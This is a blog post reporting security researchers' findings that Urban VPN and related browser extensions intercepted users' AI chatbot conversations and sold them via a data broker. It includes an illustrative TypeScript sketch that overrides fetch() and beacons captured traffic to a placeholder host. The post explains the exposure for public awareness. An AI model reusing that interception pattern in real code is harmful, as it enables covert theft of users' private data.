
Keller Maloney
Unusual - Founder
Dec 22, 2025
Security researchers at Koi Security published findings this week showing that since July 2025, the Urban VPN Proxy browser extension has been intercepting conversations across ChatGPT, Claude, Gemini, Microsoft Copilot, Perplexity, DeepSeek, Grok, and Meta AI. Every prompt sent, every response received, timestamps, session metadata—all of it compressed, exfiltrated, and sold for "marketing analytics purposes."
How it works
The extension targets ten AI platforms. For each, it includes a dedicated "executor" script designed to intercept and capture conversations. When a user visits any of the targeted platforms, the extension injects a script directly into the page—chatgpt.js for ChatGPT, claude.js for Claude, and so on.
These injected scripts override fetch() and XMLHttpRequest—the fundamental browser APIs that handle all network requests. This means the extension intercepts raw API traffic before the browser even renders the conversation. The captured data is then packaged and transmitted to Urban VPN's servers at endpoints including analytics.urban-vpn.com and stats.urban-vpn.com.
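To make the mechanism concrete, here is a minimal, hypothetical sketch of the fetch() override pattern Koi describes. This is not Urban VPN's code: the endpoint, field names, and structure are invented for illustration.

```typescript
// Hypothetical sketch of a fetch() interception pattern. The endpoint and
// all identifiers below are invented; this is not the extension's code.
const originalFetch = window.fetch.bind(window);

window.fetch = async (input: RequestInfo | URL, init?: RequestInit): Promise<Response> => {
  // Let the real request go through so the page behaves normally.
  const response = await originalFetch(input, init);

  // Clone the response so the page still receives an unconsumed body.
  const copy = response.clone();
  copy
    .text()
    .then((body) => {
      // Package the raw traffic and ship it off in the background.
      navigator.sendBeacon(
        "https://collector.example.com/ingest", // placeholder, not the real endpoint
        JSON.stringify({ url: String(input), body, ts: Date.now() })
      );
    })
    .catch(() => {
      /* ignore unreadable bodies in this sketch */
    });

  return response;
};
```

Real chat frontends stream their responses, so an actual interceptor also has to reassemble streamed bodies and pick out the prompt and reply fields for each site, which is consistent with the extension shipping a dedicated executor script per platform.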
The harvesting is enabled by default through hardcoded flags in the extension's configuration. There is no user-facing toggle to disable it. The data collection runs continuously in the background whether the VPN is connected or not. The only way to stop it is to uninstall the extension entirely.
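To make "hardcoded flags" concrete, a configuration fragment of roughly the following shape would behave exactly as described: the switch ships inside the extension bundle, no options-page control reads or writes it, and nothing in it checks whether the VPN is connected. The names here are invented, not taken from the extension.

```typescript
// Hypothetical configuration fragment illustrating a hardcoded collection flag.
// None of these identifiers come from the actual extension.
export const COLLECTION_CONFIG = {
  aiCaptureEnabled: true, // baked into the shipped bundle; no user-facing toggle exists for it
  targets: [
    "chatgpt", "claude", "gemini", "copilot",
    "perplexity", "deepseek", "grok", "meta",
  ],
  // Nothing here references VPN connection state, consistent with capture
  // running whether or not the VPN is connected.
};
```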
The timeline
The AI conversation harvesting wasn't always present. Based on Koi's analysis, the capability was introduced in version 5.5.0, released on July 9, 2025. Earlier versions did not include this functionality.
Chrome and Edge extensions auto-update by default. Users who installed Urban VPN for its stated purpose—VPN functionality—woke up one day with new code silently harvesting their AI conversations. No notification, no new consent prompt, no indication anything had changed.
Anyone who used ChatGPT, Claude, Gemini, or the other targeted platforms while Urban VPN was installed after July 9, 2025, should assume those conversations are now on Urban VPN's servers and have been shared with third parties.
The "AI Protection" irony
Urban VPN's Chrome Web Store listing promotes "AI protection" as a feature: "Our VPN provides added security features to help shield your browsing experience from phishing attempts, malware, intrusive ads and AI protection which checks prompts for personal data (like an email or phone number), checks AI chat responses for suspicious or unsafe links and displays a warning before click or submit your prompt."
The framing suggests the AI monitoring exists to protect users. The code tells a different story.
The data collection and the "protection" notifications operate independently. Enabling or disabling the warning feature has no effect on whether conversations are captured and exfiltrated. The extension harvests everything regardless.
As Koi Security researcher Idan Dardikman put it: "The extension warns you about sharing your email with ChatGPT while simultaneously exfiltrating your entire conversation to a data broker."
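In code terms, the decoupling looks something like the following hypothetical sketch, where every name is invented: the warning path reads a user setting, and the capture path never does.

```typescript
// Hypothetical sketch of the decoupling: the visible warning honors a user
// setting, while capture runs unconditionally. All names are invented.
const userSettings = { aiWarningsEnabled: true }; // the only knob the user sees

function containsPersonalData(text: string): boolean {
  return /\S+@\S+\.\S+/.test(text); // e.g. a naive email check
}

function captureAndExfiltrate(_prompt: string): void {
  // No-op in this sketch; in the reported behavior, this is the path that
  // packages the conversation and posts it to the collection endpoints.
}

function onPromptSubmit(prompt: string): void {
  if (userSettings.aiWarningsEnabled && containsPersonalData(prompt)) {
    console.warn("AI protection: personal data detected"); // the advertised feature
  }
  captureAndExfiltrate(prompt); // runs regardless of the warning setting
}

onPromptSubmit("my email is jane@example.com"); // disabling warnings changes only the first branch
```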
Where the data goes
Urban VPN is operated by Urban Cyber Security Inc., which is affiliated with BiScience (B.I Science (2009) Ltd.), a data broker company. BiScience has been on researchers' radar before. Security researchers at Secure Annex previously documented the company's data collection practices, establishing that BiScience collects browsing history tied to persistent device identifiers, provides an SDK to third-party extension developers to collect and sell user data, and monetizes this data through products like AdClarity and Clickstream OS.
Urban VPN's privacy policy confirms the relationship: "We share the Web Browsing Data with our affiliated company... BiScience that uses this raw data and creates insights which are commercially used and shared with Business Partners."
The policy also explicitly mentions AI data: "AI Inputs and Outputs. As part of the Browsing Data, we will collect the prompts and outputs queried by the End-User or generated by the AI chat provider, as applicable."
This represents an expansion of BiScience's operation—from collecting browsing history to harvesting complete AI conversations, a significantly more sensitive category of data.
Scale: 8 million users affected
After documenting Urban VPN Proxy's behavior, Koi checked whether the same code existed elsewhere. The identical AI harvesting functionality appears in seven other extensions from the same publisher, across both Chrome and Edge:
Chrome Web Store:
Urban VPN Proxy – 6,000,000 users
1ClickVPN Proxy – 600,000 users
Urban Browser Guard – 40,000 users
Urban Ad Blocker – 10,000 users
Microsoft Edge Add-ons:
Urban VPN Proxy – 1,323,622 users
1ClickVPN Proxy – 36,459 users
Urban Browser Guard – 12,624 users
Urban Ad Blocker – 6,476 users
Total affected users: over 8 million.
The extensions span different product categories—a VPN, an ad blocker, a "browser guard" security tool—but share the same surveillance backend. Users installing an ad blocker have no reason to expect their Claude conversations are being harvested.
All of these extensions carry "Featured" badges from their respective stores, except Urban Ad Blocker for Edge. These badges signal to users that the extensions have been reviewed and meet platform quality standards.
The disclosure problem
Urban VPN does disclose some of this—buried in its privacy policy and consent prompts. The consent prompt shown during extension setup mentions that the extension processes "ChatAI communication" along with "pages you visit" and "security signals," stating this is done "to provide these protections."
But the Chrome Web Store listing—the place where users actually decide whether to install—shows a different picture: "This developer declares that your data is Not being sold to third parties, outside of the approved use cases."
The contradictions are significant. The consent prompt frames AI monitoring as protective; the privacy policy reveals the data is sold for marketing. The store listing says data isn't sold to third parties; the privacy policy describes sharing with BiScience and "Business Partners." Users who installed before July 2025 never saw updated consent language—the AI harvesting was added via silent update.
Even users who see the consent prompt have no granular control. It's all or nothing.
Google's role
Urban VPN Proxy carries Google's "Featured" badge. According to Google's documentation: "Featured extensions follow our technical best practices and meet a high standard of user experience and design" and "Before it receives a Featured badge, the Chrome Web Store team must review each extension."
A human at Google reviewed Urban VPN Proxy and concluded it met their standards. Either the review didn't examine the code that harvests conversations from Google's own AI product (Gemini), or it did and didn't consider this a problem.
The Chrome Web Store's Limited Use policy explicitly prohibits "transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers." BiScience is, by its own description, a data broker.
The extensions remain live as of this writing.
Implications for prompt datasets
There's another dimension to this story that matters for anyone in marketing or AI optimization.
Many AEO and GEO tools pitch access to "real prompt data"—the actual queries people type into ChatGPT, so marketers can optimize for those prompts. OpenAI doesn't release this data. (Thank god—imagine how much personal information is in the average ChatGPT history.) So where do these datasets come from?
Now we know one answer: eavesdropping on users who thought they were protected.
The ethics here are obvious. But there's also a methodological problem. These datasets are hopelessly biased—they represent only the conversations of people who happened to install shady VPN extensions. For most companies, the overlap between this demographic and their actual customers is minimal. Drawing conclusions about "what people are asking AI" from this sample is like surveying only people who respond to phone calls from unknown numbers and extrapolating to the general population.
If a tool promises insight into "real user prompts," it's worth asking where they came from—and whether that sample has anything to do with the people you're actually trying to reach.
The original technical research was conducted by Idan Dardikman and the team at Koi Security. Their full writeup contains additional technical details and indicators of compromise.